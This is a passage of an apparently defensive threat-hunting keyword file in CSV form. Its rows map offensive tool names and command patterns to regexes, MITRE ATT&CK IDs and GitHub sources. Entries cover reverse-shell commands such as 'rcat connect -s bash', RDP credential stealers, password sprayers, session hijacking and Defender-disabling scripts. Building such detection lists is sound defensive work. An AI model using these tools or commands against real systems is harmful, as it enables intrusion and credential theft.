Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","5246","1068","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z" "*raw.githubusercontent.com/Flangvik/statistically-likely-usernames/*",".{0,1000}raw\.githubusercontent\.com\/Flangvik\/statistically\-likely\-usernames\/.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","1","N/A","10","10","965","105","2023-11-08T17:41:59Z","2022-06-28T00:00:28Z" "*raw.githubusercontent.com/swagkarna/Bypass-Tamper-Protection*",".{0,1000}raw\.githubusercontent\.com\/swagkarna\/Bypass\-Tamper\-Protection.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows 
defender protection and even bypass tamper protection - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","1","N/A","10","10","1364","299","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z" "*raw_keylogger *","raw_keylogger\s.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/trustedsec/SliverKeylogger","1","0","N/A","10","10","139","39","2023-09-22T19:39:04Z","2022-06-17T19:32:53Z" "*raw_keylogger.tar.gz*",".{0,1000}raw_keylogger\.tar\.gz.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/trustedsec/SliverKeylogger","1","1","N/A","10","10","139","39","2023-09-22T19:39:04Z","2022-06-17T19:32:53Z" "*rawrelayserver.py*",".{0,1000}rawrelayserver\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*rawSHA1_linkedIn_fmt_plug*",".{0,1000}rawSHA1_linkedIn_fmt_plug.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*rbcd.py -delegate-from * -delegate-to * -dc-ip * -action write *",".{0,1000}rbcd\.py\s\-delegate\-from\s.{0,1000}\s\-delegate\-to\s.{0,1000}\s\-dc\-ip\s.{0,1000}\s\-action\swrite\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*rbcd.py*",".{0,1000}rbcd\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*RBCD_Petitpotam_VulnerableServers.txt*",".{0,1000}RBCD_Petitpotam_VulnerableServers\.txt.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*rbsec/dnscan*",".{0,1000}rbsec\/dnscan.{0,1000}","offensive_tool_keyword","dnscan","dnscan is a python wordlist-based DNS subdomain scanner.","T1595 - T1595.002 - T1018 - T1046","TA0007 - TA0043","N/A","N/A","Reconnaissance","https://github.com/rbsec/dnscan","1","1","N/A","6","10","1076","410","2022-08-09T11:11:31Z","2013-03-13T10:42:07Z" "*rc4.py *.bin*",".{0,1000}rc4\.py\s.{0,1000}\.bin.{0,1000}","offensive_tool_keyword","HadesLdr","Shellcode Loader Implementing Indirect Dynamic Syscall - API Hashing - Fileless Shellcode retrieving using Winsock2","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/CognisysGroup/HadesLdr","1","0","N/A","10","3","275","41","2023-07-15T21:23:49Z","2023-07-12T11:44:07Z" "*rcan listen -ib *",".{0,1000}rcan\slisten\s\-ib\s.{0,1000}","offensive_tool_keyword","rustcat","Rustcat(rcat) - The modern Port listener and Reverse shell","T1090.001 - T1090.002 - T1046","TA0011 - TA0009 - 
TA0040","N/A","N/A","C2","https://github.com/robiot/rustcat","1","0","N/A","10","10","650","57","2024-04-22T10:43:11Z","2021-06-04T17:03:47Z" "*rcat c -s bash *",".{0,1000}rcat\sc\s\-s\sbash\s.{0,1000}","offensive_tool_keyword","rustcat","Rustcat(rcat) - The modern Port listener and Reverse shell","T1090.001 - T1090.002 - T1046","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/robiot/rustcat","1","0","N/A","10","10","650","57","2024-04-22T10:43:11Z","2021-06-04T17:03:47Z" "*rcat connect -s bash*",".{0,1000}rcat\sconnect\s\-s\sbash.{0,1000}","offensive_tool_keyword","rustcat","Rustcat(rcat) - The modern Port listener and Reverse shell","T1090.001 - T1090.002 - T1046","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/robiot/rustcat","1","0","N/A","10","10","650","57","2024-04-22T10:43:11Z","2021-06-04T17:03:47Z" "*rcat connect -s sh *",".{0,1000}rcat\sconnect\s\-s\ssh\s.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*rcat listen 55660*",".{0,1000}rcat\slisten\s55660.{0,1000}","offensive_tool_keyword","rustcat","Rustcat(rcat) - The modern Port listener and Reverse shell","T1090.001 - T1090.002 - T1046","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/robiot/rustcat","1","0","N/A","10","10","650","57","2024-04-22T10:43:11Z","2021-06-04T17:03:47Z" "*rcat listen -ie *",".{0,1000}rcat\slisten\s\-ie\s.{0,1000}","offensive_tool_keyword","rustcat","Rustcat(rcat) - The modern Port listener and Reverse shell","T1090.001 - T1090.002 - T1046","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/robiot/rustcat","1","0","N/A","10","10","650","57","2024-04-22T10:43:11Z","2021-06-04T17:03:47Z" "*rcat listen -l 
*",".{0,1000}rcat\slisten\s\-l\s.{0,1000}","offensive_tool_keyword","rustcat","Rustcat(rcat) - The modern Port listener and Reverse shell","T1090.001 - T1090.002 - T1046","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/robiot/rustcat","1","0","N/A","10","10","650","57","2024-04-22T10:43:11Z","2021-06-04T17:03:47Z" "*rcat-v3.*darwin-aarch64*",".{0,1000}rcat\-v3\..{0,1000}darwin\-aarch64.{0,1000}","offensive_tool_keyword","rustcat","Rustcat(rcat) - The modern Port listener and Reverse shell","T1090.001 - T1090.002 - T1046","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/robiot/rustcat","1","1","N/A","10","10","650","57","2024-04-22T10:43:11Z","2021-06-04T17:03:47Z" "*rcat-v3.*-darwin-x86_64*",".{0,1000}rcat\-v3\..{0,1000}\-darwin\-x86_64.{0,1000}","offensive_tool_keyword","rustcat","Rustcat(rcat) - The modern Port listener and Reverse shell","T1090.001 - T1090.002 - T1046","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/robiot/rustcat","1","1","N/A","10","10","650","57","2024-04-22T10:43:11Z","2021-06-04T17:03:47Z" "*rcat-v3.*-linux-x86_64*",".{0,1000}rcat\-v3\..{0,1000}\-linux\-x86_64.{0,1000}","offensive_tool_keyword","rustcat","Rustcat(rcat) - The modern Port listener and Reverse shell","T1090.001 - T1090.002 - T1046","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/robiot/rustcat","1","1","N/A","10","10","650","57","2024-04-22T10:43:11Z","2021-06-04T17:03:47Z" "*RCE-exploits*",".{0,1000}RCE\-exploits.{0,1000}","offensive_tool_keyword","POC","poc rce - The exploit samples database is a repository for RCE (remote code execution) exploits and Proof-of-Concepts for WINDOWS. 
the samples are uploaded for education purposes for red and blue teams.","T1059.001 - T1210.001 - T1212 - T1055.012","TA0002 - TA0007 - TA0008","N/A","N/A","Exploitation tools","https://github.com/smgorelik/Windows-RCE-exploits","1","1","N/A","N/A","8","734","180","2023-12-11T22:30:33Z","2018-02-13T11:23:40Z" "*RDE1-main.zip*",".{0,1000}RDE1\-main\.zip.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","1","N/A","10","10","35","5","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" "*rdi_net_user.cpp*",".{0,1000}rdi_net_user\.cpp.{0,1000}","offensive_tool_keyword","cobaltstrike","Use windows api to add users which can be used when net is unavailable","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/lengjibo/NetUser","1","1","N/A","10","10","413","92","2021-09-29T14:22:09Z","2020-01-09T08:33:27Z" 
"*rdp_check.py*",".{0,1000}rdp_check\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*rdp_doublepulsar_rce.*",".{0,1000}rdp_doublepulsar_rce\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*rdp+kerberos-password://*?dc=*proxytype*proxyhost*",".{0,1000}rdp\+kerberos\-password\:\/\/.{0,1000}\?dc\=.{0,1000}proxytype.{0,1000}proxyhost.{0,1000}","offensive_tool_keyword","evilrdp","The evil twin of aardwolfgui using the aardwolf RDP client library that gives you extended control over the target and additional scripting capabilities from the command line.","T1021.001 - T1056.001 - T1113 - T1078.002 - T1105 - T1090.002 - T1059.001","TA0008 - TA0002 - TA0005 - TA0001 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/skelsec/evilrdp","1","0","N/A","10","10","267","30","2023-12-09T17:10:52Z","2023-11-29T13:44:58Z" "*rdp+ntlm-password://*@*",".{0,1000}rdp\+ntlm\-password\:\/\/.{0,1000}\@.{0,1000}","offensive_tool_keyword","evilrdp","The evil twin of aardwolfgui using the aardwolf RDP client library that gives you extended control over the target and additional scripting capabilities from the command line.","T1021.001 - T1056.001 - T1113 - T1078.002 - T1105 - T1090.002 - T1059.001","TA0008 - TA0002 - TA0005 - TA0001 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/skelsec/evilrdp","1","0","N/A","10","10","267","30","2023-12-09T17:10:52Z","2023-11-29T13:44:58Z" "*RDPassSpray.*.log*",".{0,1000}RDPassSpray\..{0,1000}\.log.{0,1000}","offensive_tool_keyword","RDPassSpray","Python3 tool to perform password spraying using RDP","T1110.003 - T1059.006 - T1076.001","TA0001 - TA0002 - TA0008","N/A","N/A","Exploitation 
tools","https://github.com/xFreed0m/RDPassSpray","1","1","N/A","10","7","613","239","2023-08-17T15:09:50Z","2019-06-05T17:10:42Z" "*RDPassSpray.csv*",".{0,1000}RDPassSpray\.csv.{0,1000}","offensive_tool_keyword","RDPassSpray","Python3 tool to perform password spraying using RDP","T1110.003 - T1059.006 - T1076.001","TA0001 - TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/xFreed0m/RDPassSpray","1","1","N/A","10","7","613","239","2023-08-17T15:09:50Z","2019-06-05T17:10:42Z" "*RDPassSpray.py*",".{0,1000}RDPassSpray\.py.{0,1000}","offensive_tool_keyword","RDPassSpray","Python3 tool to perform password spraying using RDP","T1110.003 - T1059.006 - T1076.001","TA0001 - TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/xFreed0m/RDPassSpray","1","1","N/A","10","7","613","239","2023-08-17T15:09:50Z","2019-06-05T17:10:42Z" "*RDPassSpray-main*",".{0,1000}RDPassSpray\-main.{0,1000}","offensive_tool_keyword","RDPassSpray","Python3 tool to perform password spraying using RDP","T1110.003 - T1059.006 - T1076.001","TA0001 - TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/xFreed0m/RDPassSpray","1","0","N/A","10","7","613","239","2023-08-17T15:09:50Z","2019-06-05T17:10:42Z" "*RDPassSpray-master*",".{0,1000}RDPassSpray\-master.{0,1000}","offensive_tool_keyword","RDPassSpray","Python3 tool to perform password spraying using RDP","T1110.003 - T1059.006 - T1076.001","TA0001 - TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/xFreed0m/RDPassSpray","1","1","N/A","10","7","613","239","2023-08-17T15:09:50Z","2019-06-05T17:10:42Z" "*rdpbrute.py*",".{0,1000}rdpbrute\.py.{0,1000}","offensive_tool_keyword","RedTeam_toolkit","Red Team Toolkit is an Open-Source Django Offensive Web-App which is keeping the useful offensive tools used in the red-teaming together","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation 
tools","https://github.com/signorrayan/RedTeam_toolkit","1","1","N/A","N/A","6","512","113","2024-04-17T22:22:22Z","2021-08-18T08:58:14Z" "*RDP-Caching.ps1*",".{0,1000}RDP\-Caching\.ps1.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1044","504","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*RDPCredentialStealer.zip*",".{0,1000}RDPCredentialStealer\.zip.{0,1000}","offensive_tool_keyword","RDPCredentialStealer","RDPCredentialStealer it's a malware that steal credentials provided by users in RDP using API Hooking with Detours in C++","T1555.001 - T1059.002 - T1552.002","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/S12cybersecurity/RDPCredentialStealer","1","1","N/A","10","3","222","35","2023-06-14T10:25:33Z","2023-06-13T01:30:26Z" "*RDPCredentialStealer-main*",".{0,1000}RDPCredentialStealer\-main.{0,1000}","offensive_tool_keyword","RDPCredentialStealer","RDPCredentialStealer it's a malware that steal credentials provided by users in RDP using API Hooking with Detours in C++","T1555.001 - T1059.002 - T1552.002","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/S12cybersecurity/RDPCredentialStealer","1","1","N/A","10","3","222","35","2023-06-14T10:25:33Z","2023-06-13T01:30:26Z" "*RDPCredsStealerDLL.*",".{0,1000}RDPCredsStealerDLL\..{0,1000}","offensive_tool_keyword","RDPCredentialStealer","RDPCredentialStealer it's a malware that steal credentials provided by users in RDP using API Hooking with Detours in C++","T1555.001 - T1059.002 - T1552.002","TA0006 - TA0002 - TA0004","N/A","N/A","Credential 
Access","https://github.com/S12cybersecurity/RDPCredentialStealer","1","1","N/A","10","3","222","35","2023-06-14T10:25:33Z","2023-06-13T01:30:26Z" "*RDPCredsStealerDLL.dll*",".{0,1000}RDPCredsStealerDLL\.dll.{0,1000}","offensive_tool_keyword","RDPCredentialStealer","RDPCredentialStealer it's a malware that steal credentials provided by users in RDP using API Hooking with Detours in C++","T1555.001 - T1059.002 - T1552.002","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/S12cybersecurity/RDPCredentialStealer","1","1","N/A","10","3","222","35","2023-06-14T10:25:33Z","2023-06-13T01:30:26Z" "*rdphijack.*",".{0,1000}rdphijack\..{0,1000}","offensive_tool_keyword","RDPHijack-BOF","BOF - RDPHijack - Cobalt Strike Beacon Object File (BOF) that uses WinStationConnect API to perform local/remote RDP session hijacking.","T1021 - T1021.002 - T1032 - T1055 - T1070 - T1070.006 - T1070.007 - T1574.001","TA0002 - TA0003 - TA0004","N/A","N/A","POST Exploitation tools","https://github.com/netero1010/RDPHijack-BOF","1","1","N/A","N/A","3","265","41","2022-07-08T10:14:32Z","2022-07-08T10:14:07Z" "*rdphijack.x64*",".{0,1000}rdphijack\.x64.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object File (BOF) that uses WinStationConnect API to perform local/remote RDP session hijacking.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - 
TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/netero1010/RDPHijack-BOF","1","1","N/A","10","3","265","41","2022-07-08T10:14:32Z","2022-07-08T10:14:07Z" "*rdphijack.x64.*",".{0,1000}rdphijack\.x64\..{0,1000}","offensive_tool_keyword","RDPHijack-BOF","BOF - RDPHijack - Cobalt Strike Beacon Object File (BOF) that uses WinStationConnect API to perform local/remote RDP session hijacking.","T1021 - T1021.002 - T1032 - T1055 - T1070 - T1070.006 - T1070.007 - T1574.001","TA0002 - TA0003 - TA0004","N/A","N/A","POST Exploitation tools","https://github.com/netero1010/RDPHijack-BOF","1","1","N/A","N/A","3","265","41","2022-07-08T10:14:32Z","2022-07-08T10:14:07Z" "*rdphijack.x86*",".{0,1000}rdphijack\.x86.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object File (BOF) that uses WinStationConnect API to perform local/remote RDP session hijacking.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - 
Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/netero1010/RDPHijack-BOF","1","1","N/A","10","3","265","41","2022-07-08T10:14:32Z","2022-07-08T10:14:07Z" "*rdphijack.x86.*",".{0,1000}rdphijack\.x86\..{0,1000}","offensive_tool_keyword","RDPHijack-BOF","BOF - RDPHijack - Cobalt Strike Beacon Object File (BOF) that uses WinStationConnect API to perform local/remote RDP session hijacking.","T1021 - T1021.002 - T1032 - T1055 - T1070 - T1070.006 - T1070.007 - T1574.001","TA0002 - TA0003 - TA0004","N/A","N/A","POST Exploitation tools","https://github.com/netero1010/RDPHijack-BOF","1","1","N/A","N/A","3","265","41","2022-07-08T10:14:32Z","2022-07-08T10:14:07Z" "*RDPHijack-BOF*",".{0,1000}RDPHijack\-BOF.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object File (BOF) that uses WinStationConnect API to perform local/remote RDP session hijacking.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/netero1010/RDPHijack-BOF","1","1","N/A","10","3","265","41","2022-07-08T10:14:32Z","2022-07-08T10:14:07Z" "*RDPHijack-BOF*",".{0,1000}RDPHijack\-BOF.{0,1000}","offensive_tool_keyword","RDPHijack-BOF","BOF - RDPHijack - Cobalt Strike Beacon Object File (BOF) that uses WinStationConnect API to perform local/remote RDP session hijacking.","T1021 - T1021.002 - T1032 - T1055 - T1070 - T1070.006 - T1070.007 - T1574.001","TA0002 - TA0003 - TA0004","N/A","N/A","POST Exploitation tools","https://github.com/netero1010/RDPHijack-BOF","1","1","N/A","N/A","3","265","41","2022-07-08T10:14:32Z","2022-07-08T10:14:07Z" "*RDPInception*",".{0,1000}RDPInception.{0,1000}","offensive_tool_keyword","RDPInception","A proof of concept for the RDP Inception Attack","T1188 - T1214 - T1555.003","TA0007 - TA0008 - TA0002","N/A","N/A","Exploitation tools","https://github.com/mdsecactivebreach/RDPInception","1","1","N/A","N/A","4","342","327","2017-06-29T16:57:25Z","2017-06-29T10:08:23Z" "*RDPKeylog.exe*",".{0,1000}RDPKeylog\.exe.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Amnesiac","1","1","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "*RDPReplayer.py*",".{0,1000}RDPReplayer\.py.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","1","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*rdpscraper*",".{0,1000}rdpscraper.{0,1000}","offensive_tool_keyword","rdpscraper","rdpscraper - Enumerates users 
based off RDP Screenshots","T1110 - T1189 - T1056.001","TA0006 - TA0008 - TA0011","N/A","N/A","Information Gathering","https://github.com/x90skysn3k/rdpscraper","1","1","N/A","N/A","1","34","15","2023-10-25T21:17:52Z","2017-07-19T17:02:24Z" "*RDPSpray*",".{0,1000}RDPSpray.{0,1000}","offensive_tool_keyword","RDPSpray","Tool for password spraying RDP","T1110.001 - T1555.002","TA0006 - TA0040 - TA0003","N/A","N/A","Credential Access","https://github.com/dafthack/RDPSpray","1","1","N/A","N/A","1","91","40","2018-10-12T18:32:51Z","2018-10-12T18:29:52Z" "*RdpThief*",".{0,1000}RdpThief.{0,1000}","offensive_tool_keyword","RdpThief","Extracting Clear Text Passwords from mstsc.exe using API Hooking.","T1056.004 - T1110 - T1563.002","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/0x09AL/RdpThief","1","1","N/A","10","10","1073","343","2019-11-13T14:13:52Z","2019-11-03T17:54:38Z" "*RdpThief.*",".{0,1000}RdpThief\..{0,1000}","offensive_tool_keyword","cobaltstrike","Erebus CobaltStrike post penetration testing plugin","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 